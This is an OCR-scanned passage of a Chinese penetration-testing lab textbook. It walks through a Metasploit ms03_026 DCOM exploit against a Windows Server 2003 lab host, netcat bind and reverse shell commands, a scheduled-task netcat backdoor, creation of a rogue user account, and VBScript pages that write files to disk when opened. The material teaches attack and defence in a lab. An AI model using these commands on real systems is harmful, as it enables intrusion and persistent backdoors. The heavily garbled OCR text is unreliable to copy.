nc -l -p 80: 开启 本 机 的 TCP 80 端口 并 监听 。 
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nc -nvv -w2 -z 192. 168. 0. 1 80-1024; 扫描 192. 168. 0. 1 主机 的 80-1024 端口 。 








nc -l -p 5354 -t -e с: winntsystem32cmd. ехе: 绑 定 远程 主机 的 cmdshell ,并 开启 远程 
主机 的 TCP 5354 端口 。 
nc -t -e с: windowssystem32cmd. ехе 192. 168. 0. 2 5354: 绑 定 远程 主机 的 cmdshell， 


并 反 向 连接 192. 168. 0. 2 的 5354 端口 。 
4.5.2 实验 目的 和 条 件 


1. 实验 目的 

本 实验 较为 系统 地 介绍 了 实现 远程 人 侵 的 过 程 和 具体 实施 方法 ,其 中 被 攻击 主机 运行 
的 是 Windows Server 2003 及 以 上 版 本 的 服务 器 操作 系统 ,而 攻击 者 使 用 了 BackTrack5 Н 
带 的 metaspolit 工具 。 通 过 本 实验 ,在 读者 继续 学 习 Metaspolit 工具 使 用 方法 的 基础 
上 ,掌握 远程 人 侵 的 实现 过 程 。 

2. 实验 条 件 

本 实验 所 需要 的 软 硬 件 清 单 如 表 4-1 所 示 。 

表 4-1 远程 入 侵 实验 清单 
















































类 型 E s 软 硬 件 要 求 m ж 
1 数量 1& 
攻击 机 2 操 统 版 本 BackTrack5(BT5) 
3 软件 版 本 Metaspolit 
1 数量 Të 
ДД 2 | 操作 系统 版 本 Windows Server 
3 软件 版 本 2003 及 以 上 


4.5.3 实验 过 程 


步骤 1; 分 别 打开 靶 机 和 攻击 机 ,并 以 管理 员 身 份 登录 系统 。 其 中 ,本 实验 中 靶 机 端 运 
行 的 操作 系统 是 Windows Server 2003 ,攻击 机 上 运行 的 是 BackTrack5 操作 系统 。 

步骤 2: 登录 靶 机 后 ,打开 命令 提示 符 窗口 ,通过 “ipconfig” 命 令 查看 本 机 的 IP 地 址 ,本 
实验 为 192. 168. 12. 145 ,如 图 4-35 所 示 。 








;:NDocuments and Settings\Adninistrator>ipconfig 


Mindous IP Configuration k 


thernet adapter 


Connection ific i loudlab-com 

„жаа 192.168.12.145 
Subnet Mask - ` - ` Эё ү, 255.255.255.0 
Default Gateway . - ... 92.168.12.254 


C:\Documents and Settings\Adni ator? 





图 4-35 ”使 用 “ipconfig” 命 令 查看 靶 机 的 IP 地 址 
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步骤 3: 进入 攻击 机 ,如 果 出 现 的 是 字符 界面 ,初学 者 可 以 使 用 “startx” 命 令 切 换 到 图 
形 界面 。 
上 又 4. 使 用 “ifconfig” 命 令 查 看 攻击 机 的 IP 地 址 ,本 实验 为 192. 168. 12. 148, 如 图 4-36 




















+ 





所 示 。 


^ v x root@bt ~ 
File Edit View Terminal Help 
~# ifconfig 

Link encap:Ethernet Hwaddr 6c:0c:1d: 104 
inet аййг:192.168.12.148 Всаѕї:192.168.12.255 Маѕ?Э55,255.255.6 
inet6 addr: fe80::6e0c:ldff:fe5b:e9b4/64 Scope:Liak 
UP BROADCAST RUNNING MULTICAST MTU:1508 Metric:l 
RX packets:190 errors:0 dropped:0 overruns:0 framé:e 
TX packets:26 errors:9 dropped:6 overruns:& carrier:6 
collisions:0 txqueuelen: 1000 
RX bytes:14282 (14.2 KB) TX bytes:2487 (2.4 KB) 
Interrupt:16 Base address:0xe000 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING МТЦ: 16436 Metric:l 

RX packets:14 dfrors:0 фгорреф@® overruns:0 frandio 
k u E L GUE SU LE abu. о err 121 
s: u 0 aus 

uS D LR MIU EA A 


root@bt:-# 





图 4-36 ”使 用 “ifconfig” 命 令 查看 攻击 机 的 IP 地 址 
步骤 5: 本 实验 通过 攻击 机 (IP 地 址 为 192. 168. 12. 148) 对 靶 机 (IP 地 址 为 192. 168. 12. 145) 
进行 远程 渗透 攻击 。 首 先 使 用 BackTrack5 自 带 的 Metaspolit 渗透 工具 进行 渗透 ,可 直接 
在 终端 窗口 中 输入 “msfconsole” 命 令 , 启 用 MSF Console 工具 ,如 图 4-37 所 示 。 











f > ~ x root@bt: ~ 
File Edit View Terminal Help 


3Kom Supertiack II Logon 


User Name: 


| 

| 

I 

| 

| 

| 

| 

I 

1 Password: 
I 

| 

I 

| 

l 

| 

| - 


928 exploits - 499 auxillary - 151 post 


Ahe t aspi t-v445.P "dev q^ LIEBE 
251 payloads - 28 encodefs - 8 nops 








图 4-37 启用 MSF Console 工具 





: 本 实验 利用 Windows Server 2003 操作 系统 中 存在 的 “ms03_026 漏洞 ”进行 渗 
关于 “ms03_026 漏洞 "扫描 的 相关 知识 读者 可 查阅 相关 资料 ,在 此 不 再 缆 述 。 











第 4 章 恶意 代码 攻防 实 训 


第 4 
要 使 用 的 exploit 模块 ,如 图 4-38 fj 





下 面 使 用 “search ms03_026” 命 令 查 
Av x root@bt: ~ 


File Edit View Terminal Help 


Ls ѕеагсһ т503 0: 


Matching Modules 
Disclosure Date Rank, 


2003-07-16 00:00:00 UTC dgfeat 


exploit/windows/dcerpc/ms63 626 сот 
ft RPC DCOM Interface Overflow 





图 4-38 ”使 用 “search ms03_026” 命 令 查找 需要 使 用 的 exploit 模块 
数 , 如 图 4-39 所 示 。 





使 用 “show options” 命 令 可 以 查看 exploit Hh 


л v х root@bt: ~ 


File Edit View Terminal Help 


use exploit/windows/dcerpc/ms03 626 dcom 


f expTollí(ms03 026 dcom) > 
msf exploit(ms03_026_dcom) > [Show options] 
Module options (exploit/windows/dcerpc/ms03_ 6926_dcom) 


Name Current Setting Required ED 
address 
The target port 


RHOST . 
RPORT E 


Exploiff target: 


Id Мапе 
Ж Universal 


Windows NT SP3-6a/2000/XP/2| 


С) 


msf exploit(ms03_026_dcom) > 





4-39 EF exploit 模块 的 参数 


步骤 8: 使 用 “set" 命 令 设置 渗透 攻击 过 程 中 所 需 的 参数 ,如 图 4-40 所 示 。 

RHOST: 远程 主机 的 IP 地 址 。 例 如 ,通过 “set RHOST 192. 168. 12. 145 

需要 进行 远程 渗透 攻击 的 远程 主机 的 IP 地 址 为 192. 168. 12. 145 
RPORT: 远程 主机 的 端口 。 
另外 .Required 栏 中 标注 为 yes 的 项 .表示 必须 要 设置 的 内 容 。 














5” 命 令 , 设 


л. 


置 
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A v x root@bt ~ 
File Edit View Terminal Help 


Ө Windows NT SP3-6a/2000/XP/2003 Universal 


msf exploit(ms03 026 dcom) > set RHOST 192:168:12.145 

RHOST => 192.168.12.145 

imsf exploit(ms03 826 dcom) > show options 

Module options (exploit/windows/dcerpc/ms63 026 dcom): 
Name Current Setting Required Description 


RHOST 192.168. 12.145 yes The target address 
RPORT 135 yes The target port 


ploi tate f? 
Id (Маше 
° Windows NT SP3-6a/2000/XP/2003 Universal 





Imsf exploit(ms03 026 dcom) > 
图 4-40 ”使 用 “set” 命 令 设置 渗透 攻击 过 程 中 所 需 的 参数 
远程 渗透 攻击 ,攻击 过 程 和 结 
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步骤 9. 设置 完成 后 ,使 用 “exploit" 命 令 开始 对 靶 机 进行 


果 如 图 4-41 所 示 。 结 果 显 示 已 经 渗透 成 功 ,其 中 ,Meterpreter 是 yas fit 默认 的 shellcode。 





File Edit View Terminal Help 


RPORT 135 yes The target port 


Exploit target: 
Id Name 
6 windows NT SP3-6a/2000/XP/2003 Universal 


Insf exploit(ms03 026 dcom) > exploit 
[*] Started reverse handler on 192.168.12.148:4444 

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal. 

[*] Bipding to 4d9f4ab8-7dlc-llcf «861e-00202f6e7c57:0. SOncagn ip *ср. 19271687020 


[*] Sending stage (752128 bytes) 1 192.168.12.145 
[*] Meterpreter session 1 opened (192.168.12.148:4444 -> 192.168.12.1439*405) at 


2014-07-23 17:55:35 +0800 





ineterpreter > | 
图 4-41 使 用 “exploit” 命 令 开始 对 靶 机 进行 远程 渗透 攻击 





步 又 10: 使 用 “shell” 命 令 , 可 以 创建 一 个 攻击 者 需要 的 shell 权限 ,其 中 显示 了 靶 机 的 
操作 系统 类 型 及 版 本 等 信息 ,如 图 4-42 所 
步骤 11: 渗透 成 功 后 ,为 了 下 次 方便 登录 该 靶 机 , 攻 
攻击 机 上 搭建 一 个 tftp 服务 器 ,本 实验 使 用 了 BT5 自 带 的 tftp эү 
tftpboot 目录 下 ,如 图 4-43 所 示 。 有 关 tftp 服务 器 的 搭建 过 程 , 请 读者 参阅 相关 资料 完成 ， 


在 此 不 再 袭 述 





f 者 还 需要 留 一 个 后 门 。 首 先 ,在 














F/home/ 
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$ 


又 12. 


File Edit View Terminal Help 
meterpreter > 
meterpreter > 
eter > 
meterpreter > 
meterpreter > 
meterpreter > 
meterpreter > 


E [зве] 


Process 428 created. 


Channel 1 created. 


C: \WINDOWS\ sys tem32> 
C: NWINDOWSNSystem32» 
Cs \WINDÓWS Ys y ®ёна2>, 
Et WINDOWSXSyStem3p> 


C: \WINDOWS\system32> 
С: \WINDOWS\ sys tem32> 





图 4-42 使 用 "shell" 命 令 创建 一 个 shell 权限 


^ v X root@bt: /home/tftpboot 
File Edit View Terminal Help 
root@bt:/# cd /home Ptoct/ 


7home/tftpboot# 





4-43 ЖЛ tftp 服务 器 主 文件 所 在 的 目录 


使 用 tftp 工具 将 nc. ехе 工具 上 传 到 靶 机 的 C:\Windows\system32 目录 下 。 


有 具体 命令 为 "tftp -i 192. 168. 12. 148 get nc. exe”, 即 将 攻击 机 上 的 пс. ехе 工具 上 传 到 靶 机 
(IP 地 址 为 192. 168. 12. 145) 的 C:\Windows\system32\ 目 录 下 。 本 次 操作 失败 ,显示 如 


图 4 





A 所 示 的 信息 。 上 传 失 败 的 原因 是 пс. exe 的 权限 较 低 ,需要 使 用 chmod 命令 提 权 后 


再 进行 上 传 操作 。 


步骤 13: 
步骤 14: 
件 上 传 到 靶 机 








步骤 15: 





iE FH" chmod 777 nc. exe” 命 令 对 nc. exe 文件 进行 提 权 操作 ,如 图 4-45 所 示 。 
再 次 使 用 “tftp -i 192. 168. 12. 148 get nc. exe" fp 4 ,将 攻击 机 上 的 пс. exe Ж 
的 C:\Windows\system32\ 目 录 下 ,显示 如 图 4-46 所 示 的 信息 ,说 明 上 传 成 功 。 
使 用 "netstat -ano” 命 令 查 看 靶 机 上 打开 的 端口 情况 ,如 图 4-47 所 示 。 
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File Edit View Terminal Help 


[*] Started reverse handler on 192.168.12.148:4444 
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal 

[*] Binding to 4d9f4ab8-7dl1c-11cf-861e-0020af6e7c57;0.0@nçəaca-ipstcpl192.168.12. 
145[135] 

[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncəcr” 1p tcp:1924168,12.14 
5[135] .. 

[*] Sending exploit 

[*] Sending stage (752128 bytes) to 192.168.12.145 

[*] Meterpreter session 1 opened (192.168.12.148:4444 -> 192.168.18145:1105) at 
2014-07-23 17:55:35 +9800 


Imeterpreter > shell 
Process 1972 created. 


|Сһаппе 1 created. ` 
Місгоѕ@ с windows [619 5.2.3790] 
ЯК „ыш M doiit carp. 


(©. wIND0ws (S y Stef 2»tttp Bi `їз2.1фВ.12.14в get hezéXe 
tftp -i 192.168.12.148 get nc.exe 

Error on server : Access violation 

Connect request failed 





|С: WINDOWS Y sys tem32> 


4-44 上 传 nc. exe 工具 失败 


~# cd /home/tftpboot/ 
/home/tftpboot# 15 


/home/tftpboot# chmod 777 nc.exe 
/home/tftpboot# | 





图 4-45 Xj nc. exe 文件 进行 提 权 操作 


|С: \WINDOWS\ system32>tftp -i 192.1 电 .12.148 get пс.ехе 
tftp -i 192.168.12.148 get nc.exe 
[Transfer successful: 61440 bytes іп 1 second, 61440 bytes/s 





С: \WINDOWS\ system32> Y 


图 4-46 成 功 上 传 nc.exe T R. 


File Edit View Terminal Help 
Transfer successful: 61440 bytes in 1 second, 61440 bytes/s 


С: WINDOWSNSystem32>netstat -ano 
netstat -ano 


Active Connections 


Proto State 

TCP .0.0: .0.0. LISTENING 
TCP .8. : .0.0.0: LISTENING 
TCP .0.0.0: .0.0.0: LISTENING 


TCP .9.9.9: .0.0. LISTENING 
TCP .0.0.0: .0.0. LISTENING 
TCP .168.12.145:1671 Ë 5 TIME WAIT 


ES 
a 
E 


TCP -168.12.145:1972 -168.12. TIME WAIT 
TCP .168.12.14$: E В 2. po нАІТ 
ТСР Bor uus. E A imni т 
TCP 2681286 45: 1075, 。 | TIME WAIT 
ТСР Чыв“ 15: 1650 TIME WAIT 
TCP 168.12.145:1083 z TIME WAIT 
TCP -168.12.145:1084 22. ТІМЕ WAIT 
ТСР 168.12.145:1085 E д TIME WAIT 
TCP 168.12.145:1086 : TIME WAIT 
ТСР .168.12.145:1087 .168.12. TIME WAIT 


图 4-47 查看 靶 机 上 打开 的 端口 情况 


o o o é оо à gre do 
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步骤 16: 使 用 “net time NN192. 168. 12. 145” 命 令 查看 靶 机 的 当前 系统 时 间 , 如 图 4-48 
所 示 。 


ls: \нтн@ Ns y 683 2 ak U 192. 1657127 1099 
CIS a US RU 
^ 192. 168212. 79570 0720000 мо, 00:91:57 


2222122222 


C: \WINDOWS\ system32> 





В 4-48 查看 靶 机 上 的 系统 时 间 


步骤 17: 利用 at 任务 计划 命令 ,使 靶 机 上 已 经 上 传 的 nc. exe 工具 能 够 根据 攻击 者 的 
要 求 ,实现 定时 自动 运行 。 命 令 为 “at \\192. 168. 12. 145 02:02 nc. exe -l -p 5354 -t -e "c:\ 
windows\system32\cmd. exe"”。 通 过 该 设置 , 靶 机 (IP 地 址 为 192. 168. 12. 145) 在 每 天 的 
02:02 定时 运行 nc. exe 程序 。 

输入 “nc. exe -l -p 5354 -t -e "c:\windows\system32\cmd. exe" ”命令 ,可 以 实现 nc. exe 
Г.Д 5354 端口 与 cmd. ехе 之 间 的 绑 定 。 

以 上 操作 过 程 和 结果 显示 如 图 4-49 Bron 。 


|С: \WINDOWS\system32>at \\192.168.12.145 82:02 nc.exe -l -p 5354 -t W&c; indov| 
s\system32\cmd.exe" 

at \\192.168.12.145 02:02 nc.exe -l -p 5354 -t -e “c:WindowsVsystem32Vcmd.exe" 
的 006h 好 66-666666- ID = X 


je: \нти y 8832 4€ 
at 
ооб 


пс.ехе -l -p 5354 енене? иіп 
|dows system32 cmd. exe 





|С: WWINDOWS V system32» 
图 4-49 利用 "at" 命 令 实 现在 靶 机 上 定时 运行 指定 的 程序 ,并 实现 端口 与 指定 程序 之 间 的 绑 定 


步骤 18: 通过 以 上 设置 ,当时 间 到 达 02:02 时 ,nc. ехе 程序 开始 自动 运行 。 此 时 ,可 以 
使 用 “telnet” 命 令 连接 到 靶 机 ,如 图 4-50 所 示 。 


rootëbt:-# telnet 192.168.12.145 5354 
Trying 192.168.12.145. 

Connected to 192.16 145 

Escape character is 

Microsoft Windows [$/j 5.2.3790] 

(C) 0660666 1985-2003 Microsoft Corp. 


C: WINDOWSNSystem32>B] 





图 4-50 ”使 用 “telnet” 命 令 远程 登录 靶 机 


步骤 19. 连接 成 功 后 攻击 机 将 获得 对 靶 机 的 控制 权限 ,之 后 就 可 以 在 靶 机 上 进行 相关 
的 操作 。 例 如 ,使 用 “net user hh 123456 /add” 命 令 ,在 靶 机 上 创建 一 个 名 称 为 hh、 密 码 为 
123456 的 新 建 用 户 账户 ,如 图 4-51 所 示 。 

步骤 20: 使 用 “netstat -ano” 命 令 查看 已 经 打开 的 端口 ,如 图 4-52 所 示 ,显示 5354 端口 
处 于 被 打开 状态 。 
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v * |root@bt: 
Edit View Terminal Help 
IC:\WINDOWS\system32tnet user hh 123456 /add 


C: WINDOWS Asystem32» 
С: WINDOWSAsystem32»net user 
net user 


Administrator Guest 
[SUPPORT 388945a8 


C: WINDOWSNsystem32> 
C: WINDOWSNSystem32> 


ІС: \WINDOWS\system32> 
С: \WINDOWS\ sys temB2> 





C: WINDOWS Asystem32» 


图 4-51 在 靶 机 上 创建 新 用 户 账户 


TCP .0.0:1025 EEEE LISTENING 
TCP 。 1027 KERE LISTENING 
TCP .0.0:5205 .0.0.0: LISTENING 
TCP .168.12.145:1165 .12.148:4444 ESTABLISHED 
ТСР б 12.145:1210 E 445 TIME WAIT 
TCP .168.12.145:1214 Е :445 TIME WAIT 
TCP Г 12.145:1215 s :445 TIME WAIT 
TCP .168.12.145:1216 К :445 TIME WAIT 
ТСР К 12.145:1217 " :445 TIME WAIT 
TCP .168.12.145:1219 .154:445 ТІМЕ МАІТ 
ТСР .168.12.145:1220 .154:445 TIME WAIT 
ТСР .168.12.145:1250 .184:445 TIME WAIT 
TCP .168.12.145:1251 .184:445 TIME WAIT 
ТСР 12.145:1254 y .187:445 ЅҮН ЅЕМТ 
CP 2.168.12.145:5354 .148:49345 ESTABLISHED 
UDP 

UDP 

UDP 

UDP 

UDP 

UDP 


C: WINDOWSNSystem32> 
|С: \WINDOWS\ sys tem32: 





В 4-52 显示 靶 机 上 处 于 打开 状态 的 端口 信息 





其 他 功能 的 应 用 , 
4.5.4 任务 与 思考 


本 实验 综合 了 多 方面 的 网 络 攻 击 知 识 , 主 要 包括 漏洞 的 利用 远程 控制、 远程 入侵、 提 权 
操作 ,后 门 设置 等 ,读者 可 继续 深入 系统 地 学 习 这 些 内 容 。 同 时 ,在 本 实验 的 基础 上 , 继 
行 如 下 内 容 的 实验 。 

(1) 针对 特定 服务 的 攻 

(2) 针对 远程 节点 的 攻击 。 

(3) 针对 用 户 账户 的 攻 


者 可 在 Meterpreter 工具 帮助 文档 的 支持 下 ,自己 学 习 和 掌握 。 
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4.6 脚本 及 恶意 网 页 攻击 


4.6.1 预备 知识 : 脚本 及 恶意 网 页 


1. 脚本 

脚本 (script) 是 使 用 一 种 特定 的 描述 性 语言 ,依据 一 定 的 格式 编写 的 可 执行 文件 ,该 文 
件 又 称 为 宕 或 批 处 理 文 件 。 脚 本 是 批 处 理 文件 的 延伸 ,是 一 种 以 纯 文本 方式 保存 的 程序 。 
通常 所 讲 的 计算 机 脚本 程序 ,是 指 由 一 系列 能 够 控制 计算 机 进行 运算 操作 的 指令 形成 的 集 
合 ,该 集合 中 的 指令 之 间 存 在 一 定 的 逻辑 关联 性 。 

简单 地 讲 ,脚本 是 用 文本 编辑 器 (如 Windows 操作 系统 中 的 “记事 本 ”) 编 写 的 一 条 条 命 
4 ,脚本 程序 在 执行 时 ,由 系统 的 一 个 解释 器 将 其 逐条 翻译 成 机 器 可 识别 的 指令 ,并 按 程序 
顺序 执行 。 因 为 脚本 在 执行 时 多 了 一 个 翻译 过 程 ,所 以 它 比 二 进 制程 序 的 执行 效率 低 。 

脚本 通常 可 以 由 应 用 程序 临时 调用 并 执行 。 各 类 脚本 被 广泛 地 应 用 于 网 页 设计 中 , 因 
为 脚本 不 仅 可 以 减 小 网 页 的 规模 ,提高 网 页 浏览 的 速度 ,而且 可 以 丰富 网 页 的 显示 效果 ,如 
动画 声音 等 。 例 如 , 当 单 击 网 页 上 的 邮箱 地 址 时 ,系统 会 自动 调用 在 系统 上 已 经 安装 的 
Outlook Express 或 Foxmail 等 邮件 收发 和 管理 软件 ,其 中 的 自动 调用 过 程 就 是 通过 脚本 功 
能 来 实现 的 。 也 正 是 因为 脚本 的 这 些 特 点 ,往往 被 攻击 者 利用 ,如 在 脚本 中 加 入 一 些 破 坏 计 
算 机 系统 的 命令 ,这 样 当 用 户 浏览 网 页 时 ,一 旦 调用 这 类 脚本 . 便 会 使 用 户 的 系统 受到 攻击 。 

2. 网 页 病毒 

网 页 病毒 是 利用 网 页 进行 攻击 的 一 类 恶意 代码 , 它 具 有 以 下 明显 的 特征 。 

(1) 其 性 质 是 一 类 恶意 代码 。 

(2) 其 目的 是 进行 破坏 ,或 者 扰乱 用 户 的 正常 操作 。 

(3) 其 实现 方式 是 借助 Web 应 用 尤其 是 浏览 器 存在 的 安全 漏洞 ,并 通过 植 人 方式 进行 攻击 。 

网 页 病毒 能 够 以 各 种 方式 自动 执行 ,其 根源 是 它 完 全 不 受用 户 的 控制 。 当 用 户 一 旦 浏 
览 了 含有 恶意 代码 的 网 页 时 ,恶意 代码 就 会 自动 执行 ,给 用 户 端 计 算 机 带 来 不 同 程度 的 破坏 
或 影响 。 

网 页 病毒 一 般 通过 以 下 的 形式 诱 使 用 户 来 访问 。 

(1) 一 个 好 听 的 网 页 名 称 。 

(2) 利用 浏览 者 的 猎奇 或 贪 禁 心理 。 

(3) 无 意识 的 浏览 者 。 


4.6.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 进一步 学 习 和 掌握 以 下 内 容 。 
СТ) 脚本 的 特征 和 编写 方法 。 

(2) 网 页 病毒 的 特征 和 攻击 方式 。 

(3) 网 页 病毒 的 安全 防范 方法 。 
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2. 实验 条 件 

本 实验 可 在 Windows XP 及 以 上 版 本 操作 系统 的 计算 机 上 进行 ,该 计算 机 既 可 以 是 一 
台 物 理 机 ,也 可 以 是 一 台 虚 拟 机 。 
4.6.3 实验 过 程 


步骤 1: 以 Administrator 身份 登录 实验 中 的 计算 机 操作 系统 。 
步骤 2: 进入 实验 前 先 准备 好 脚本 文件 所 在 的 文件 夹 D:\tools, 如 图 4-53 所 示 。 相 关 
文件 的 内 容 , 在 随后 的 实验 中 将 会 介绍 。 


——À—— 

















图 4-53 实验 用 的 文件 夹 


步骤 3: 用 “记事 本 "等 文本 编辑 工具 打开 “创建 . txt” 文 件 ,将 显示 如 图 4-54 所 示 的 执 
行 脚本 的 内 容 。 


Ë 创建 - 记事 本 

XET) Ao) 格式 四) EEV 帮助 00 
<HTML> 

<HEAD> 

<TITLE> 创 建文 件 c:\TEST-HTMK/TITLE> 
<SCRIPT LRNGURCE-"UBScript"» 


“шщ 





Dim fso, f1 
Set fso = Createübject("Scripting.FileSystemübject") 
Set f1 = fso.CreateTextFile("c:NTEST.HTM", True) 





图 4-54 “创建 .txt" 文 件 的 内 容 


步骤 4: 打开 C 盘 ,查看 C 盘 下 是 否 有 test. htm 文件 。 正 常情 况 下 ,此 时 不 会 在 C # F 
存在 test. htm 文件 。 

步骤 5: 修改 “创建 . txt” 文 件 的 类 型 为 . htm, 然 后 单 击 该 文件 使 其 运行 。 当 出 现 如 图 4-55 
所 示 的 提示 信息 时 , 单 击 “ 确 定 ” 按 钮 ,允许 阻止 的 内 容 的 运行 。 随 后 ,出 现 如 图 4-56 所 示 的 
空白 显示 页 面 。 
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Ezplorer 








文件 s r 

Q= - @ - [3 l @ Ра ур» © @- ` m - [J $ G 

ИЛЕ) [ir] n: \+оо1з\ЁВ# м» apea ss 
(Q 为 帮助 保护 您 的 安全 ，Internet Explorer 已 经 限制 此 文件 显示 可 能 访问 您 的 计算 机 的 活动 内 容 。 单 击 此 处 查看 选项 х 





您 注意 到 信息 栏 了 吗 ? 


口 不 再 显示 此 信息 0). 
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图 4-55 浏览 器 安全 提示 信息 
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图 4-56 空白 显示 页 面 
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步骤 6: 重新 查看 C 盘 , 就 会 发 现存 在 一 个 名 称 为 TEST. HTM 的 文件 ,如 图 4-57 


所 示 。 
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图 4-57 自动 创建 的 名 称 为 TEXT. НТМ 的 文件 


说 明 通过 在 浏览 器 中 和 运行 “创建 . him" ХЕЛ. C 盘 下 自动 创建 了 一 个 名 称 为 


"TEST. HTM” 的 文件 。 


步骤 7: 打开 D:\tools 文件 夹 中 的 “修改 . txt” 文 件 ,此 文件 主要 对 前 面 已 


"test, htm” 文 件 的 内 容 进行 修改 ,“ 修 改 . txt” 文 件 的 内 容 如 图 4-58 所 示 。 


<TITLE> 修 改 文件 内 容 c:\TEST. ER 

<SCRIPT LANGUAGE="VBScript" 

ge. 
Dim fso, tf 
Set fso = Createübject("Scripting.FileSystemübject") 
Set tf = fso.CreateTextFile("c:VTEST.HTM", True) 


vip d ы радар ttt E ete ) 


向 文件 写 三 
tf-WriteBlankLines(3) 


5—1. 
tf Write ("This is a test.") 
tf.Close 
--> 
</SCRIPT> 
</HEAD> 
<BODY> 


4-58 “修改 .txt" 文 件 的 内 容 





经 创建 的 


步骤 8: 修改 “修改 . txt" 文 件 的 类 型 为 . htm, 然 后 单 击 该 文件 使 之 运行 , 当 出 现 类 似 如 
图 4-59 所 示 的 安全 提示 信息 时 ,选择 “允许 阻止 的 内 容 ” 选 项 ,并 在 出 现 的 对 话 框 中 直接 单 


击 “ 是 ”按钮 ,允许 该 文件 在 浏览 器 中 打开 ,如 图 4-60 所 示 。 


步骤 9: 当 “ 修 改 . htm” 运 行 结束 后 ,再 运行 C 盘 中 的 test. him 文件 ,将 出 现 如 图 4-61 


所 示 的 页 面 , 说 明 修改 文件 内 容 成 功 。 


请 读者 按照 以 上 “创建 .txt? 和 ”修改 . txt” 文件 的 内 容 和 操作 方法 ,通过 编写 “拷贝 . txt” 
和 “复制 . txt” 脚 本 文件 ,完成 相关 的 实现 。 其 中 ,“ 拷 贝 . txt” 脚 本 的 功能 是 将 “test. htm” 复 





制 到 桌面 上 ,“ 删 除 . txt” 脚 本 的 功能 是 将 桌面 上 的 test. htm 文件 删除 。 
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图 4-59 系统 安全 提示 信息 
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4-60 单 击 “是 ”按钮 ,允许 该 文件 在 浏览 器 中 打开 
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ЛА C:ATEST.HTN — Microsoft Internet Ezplorer 
кф} SEE EEV био) IAM 帮助 00 


Оч. O- DAGA i-o E - L) £ 8 


ЊЕ m) ë) c: TEST, кти 


由 网 页 脚本 的 方式 修改 已 存在 文件 内 容 成 功 This is a test. 














В 4-61 显示 修改 后 的 test, htm 文件 内 容 


4.6.4 任务 与 思考 


根据 目前 互联 网 上 流行 的 常见 网 页 病毒 的 作用 对 象 及 表现 特征 ,可 以 将 网 络 病毒 归纳 
为 以 下 两 大 类 。 

1. 通过 Java Script, Applet 和 ActiveX 编辑 的 脚本 程序 修改 1Е 浏览 器 

该 类 病毒 的 主要 特征 如 下 o 

CD 修改 默认 主页 。 

(2) 主页 设置 被 屏蔽 锁定 , 且 设 置 选项 无 效 不 可 改 回 。 

(3) 默认 的 IE 搜索 引擎 被 修改 ,IE 标题 栏 被 添加 非法 信息 。 

(4) OE(Outlook Express) 标 题 栏 被 添加 非法 信息 。 

(5) 鼠标 右键 菜单 被 添加 非法 网 站 广告 链接 ,鼠标 右键 弹出 菜单 功能 被 禁用 失常 。 

(6) IE 收藏 夹 被 强行 添加 非法 网 站 的 地 址 链接 ,在 IE 工具 栏 非法 添加 按钮 。 

(7) 锁定 地 址 下 拉 菜 单 及 其 添加 文字 信息 。 

(8) IE 菜单 “查看 ”下 的 “ 源 文 件 ” 被 禁用 。 

2. 通过 Java Script, Applet 和 ActiveX 编辑 的 脚本 程序 修改 用 户 操作 系统 

该 类 病毒 的 主要 特征 如 下 。 

(1) 开机 出 现 对 话 框 。 

(2) 系统 正常 启动 后 ,但 IE 被 锁定 网 址 自动 调用 打开 。 
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(3) 格式 化 硬盘 。 

(4) 非法 读 取 或 盗 取 用 户 文件 。 

(5) 锁定 禁用 注册 表 , 当 编辑 * . reg 注册 表 文 件 时 显示 乱码 。 
(6) 时 间 前 面 加 广告 。 

(7) 启动 后 首页 被 再 次 修改 。 

(8) 更 改 “ 我 的 电脑 ”下 的 一 系列 文件 夹 名 称 。 





第 5 章 Web 服务 器 攻防 实 训 


“知己 知 彼 , 百 战 不 列 ? 最 早出 现在 军事 领域 , 意 为 如 果 要 想 打 起 仗 来 不 会 有 危险 ,并 能 
够 在 战斗 中 取胜 ,就 需要 事先 对 敌我 双方 的 详细 情况 进行 全 面 的 了 解 和 分 析 , 得 出 正确 的 结 
论 和 判断 。 攻 击 者 在 确定 了 攻击 对 象 后 ,只 有 在 实施 攻击 前 全 面 掌握 被 攻击 对 象 的 详细 配 
置信 息 ,才能 从 中 发 现 可 利用 的 安全 漏洞 ,进而 确定 具体 的 攻击 方法 ,并 实施 渗透 攻击 。 本 
章 主要 针对 Web 服务 器 的 安全 问题 ,通过 对 几 个 典型 的 攻防 实验 操作 ,使 读者 对 Web 服务 
器 的 安全 性 有 一 个 直观 的 认识 。 











5.1 主机 扫描 : 路 由 信息 的 收集 


5.1.1 预备 知识 : 路 由 信息 


路 由 路 径 跟踪 是 实现 网 络 拓扑 探测 的 主要 手段 , Linux 操作 系统 中 的 traceroute 和 
Windows 环境 中 的 tracert 程序 分 别提 供 了 不 同 平台 上 的 路 由 路 径 跟 踪 功 能 ,两 者 的 实现 原 
理 相同 ,都 是 用 TTL(Time To Live, 生 存 时 间 ) 字 段 和 ICMP 错误 消息 来 确定 从 一 个 主机 
到 网 络 上 其 他 主机 的 路 由 ,从 而 确定 ТР 数据 包 访问 目标 IP 所 采取 的 路 径 。 当 对 目标 网 络 
中 的 不 同 主机 进行 相同 的 路 由 跟踪 后 ,攻击 者 就 可 以 综合 这 些 路 径 信息 ,绘制 出 目标 网 络 的 
拓扑 结构 ,并 确定 关键 设备 在 网 络 拓扑 中 的 具体 位 置信 息 

路 由 器 (router) 是 一 种 网 络 通 信 设 备 ， 它 工作 在 网 络 层 ， 通过 将 应 用 层 的 报 文 划分 成 一 
个 个 分 组 后 独立 地 发 送 到 目的 地 (目的 网 络 ) ,这 个 过 程 称 为 路 由 。 在 网 络 拓扑 组 成 中 ,路 
器 就 是 连接 两 个 以 上 网 络 的 互联 设备 。 目 前 ,路 由 器 是 互联 网 中 连接 不 同 局 域 网 ,广域网 此 
网 络 互 联 设备 。 路 由 器 根据 不 同 的 算法 (路 由 协议 ) 自动 选择 和 设 定 路 由 ,以 最 佳 路 径 将 原 
网 络 中 的 分 组 逐个 发 送 到 目的 网 络 。 路 由 器 是 互联 网 络 的 枢纽 ,可 以 理解 为 现代 交通 环境 
中 的 “交通 警察 ”。 


5.1.2 实验 目的 和 条 件 

















1. 实验 目的 

